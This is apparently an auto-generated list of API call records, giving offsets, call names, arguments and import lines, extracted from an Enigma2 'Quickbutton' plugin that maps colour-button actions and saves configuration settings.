[((1253, 1271), 'Components.config.ConfigSubsection', 'ConfigSubsection', ([], {}), '()\n', (1269, 1271), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((1325, 1351), 'Components.config.ConfigYesNo', 'ConfigYesNo', ([], {'default': '(False)'}), '(default=False)\n', (1336, 1351), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((2782, 2856), 'Plugins.Plugin.PluginDescriptor', 'PluginDescriptor', ([], {'where': 'PluginDescriptor.WHERE_SESSIONSTART', 'fnc': 'autostart'}), '(where=PluginDescriptor.WHERE_SESSIONSTART, fnc=autostart)\n', (2798, 2856), False, 'from Plugins.Plugin import PluginDescriptor\n'), ((3767, 3815), 'Components.ActionMap.HelpableActionMap', 'HelpableActionMap', (['self', '"""QuickbuttonActions"""', 'x'], {}), "(self, 'QuickbuttonActions', x)\n", (3784, 3815), False, 'from Components.ActionMap import ActionMap, HelpableActionMap\n'), ((7747, 7777), 'Screens.Screen.Screen.__init__', 'Screen.__init__', (['self', 'session'], {}), '(self, session)\n', (7762, 7777), False, 'from Screens.Screen import Screen\n'), ((7906, 8077), 'Components.ActionMap.ActionMap', 'ActionMap', (["['SetupActions', 'ColorActions']", "{'green': self.keySave, 'cancel': self.keyClose, 'ok': self.keySave, 'left':\n self.keyLeft, 'right': self.keyRight}", '(-2)'], {}), "(['SetupActions', 'ColorActions'], {'green': self.keySave,\n 'cancel': self.keyClose, 'ok': self.keySave, 'left': self.keyLeft,\n 'right': self.keyRight}, -2)\n", (7915, 8077), False, 'from Components.ActionMap import ActionMap, HelpableActionMap\n'), ((8094, 8146), 'Components.ConfigList.ConfigListScreen.__init__', 'ConfigListScreen.__init__', (['self', '[]'], {'session': 'session'}), '(self, [], session=session)\n', (8119, 8146), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((9443, 9547), 'Components.PluginComponent.plugins.getPlugins', 'plugins.getPlugins', ([], {'where': '[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]'}), '(where=[PluginDescriptor.WHERE_EXTENSIONSMENU,\n PluginDescriptor.WHERE_PLUGINMENU])\n', (9461, 9547), False, 'from Components.PluginComponent import plugins\n'), ((10379, 10448), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'red_selectedindex', 'choices': 'self.entryguilist'}), '(default=red_selectedindex, choices=self.entryguilist)\n', (10394, 10448), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10470, 10541), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'green_selectedindex', 'choices': 'self.entryguilist'}), '(default=green_selectedindex, choices=self.entryguilist)\n', (10485, 10541), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10564, 10636), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'yellow_selectedindex', 'choices': 'self.entryguilist'}), '(default=yellow_selectedindex, choices=self.entryguilist)\n', (10579, 10636), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10657, 10727), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'blue_selectedindex', 'choices': 'self.entryguilist'}), 
'(default=blue_selectedindex, choices=self.entryguilist)\n', (10672, 10727), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((11822, 11852), 'Components.ConfigList.ConfigListScreen.keyLeft', 'ConfigListScreen.keyLeft', (['self'], {}), '(self)\n', (11846, 11852), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((11896, 11927), 'Components.ConfigList.ConfigListScreen.keyRight', 'ConfigListScreen.keyRight', (['self'], {}), '(self)\n', (11921, 11927), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((12700, 12733), 'Components.config.config.plugins.Quickbutton.save', 'config.plugins.Quickbutton.save', ([], {}), '()\n', (12731, 12733), False, 'from Components.config import config\n'), ((12736, 12753), 'Components.config.configfile.save', 'configfile.save', ([], {}), '()\n', (12751, 12753), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((11172, 11243), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'red_b_selectedindex', 'choices': 'self.entryguilist'}), '(default=red_b_selectedindex, choices=self.entryguilist)\n', (11187, 11243), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((5678, 5704), 'Components.config.config.av.policy_43.save', 'config.av.policy_43.save', ([], {}), '()\n', (5702, 5704), False, 'from Components.config import config\n'), ((6368, 6472), 'Components.PluginComponent.plugins.getPlugins', 'plugins.getPlugins', ([], {'where': '[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]'}), '(where=[PluginDescriptor.WHERE_EXTENSIONSMENU,\n PluginDescriptor.WHERE_PLUGINMENU])\n', (6386, 6472), False, 'from Components.PluginComponent import plugins\n')]
|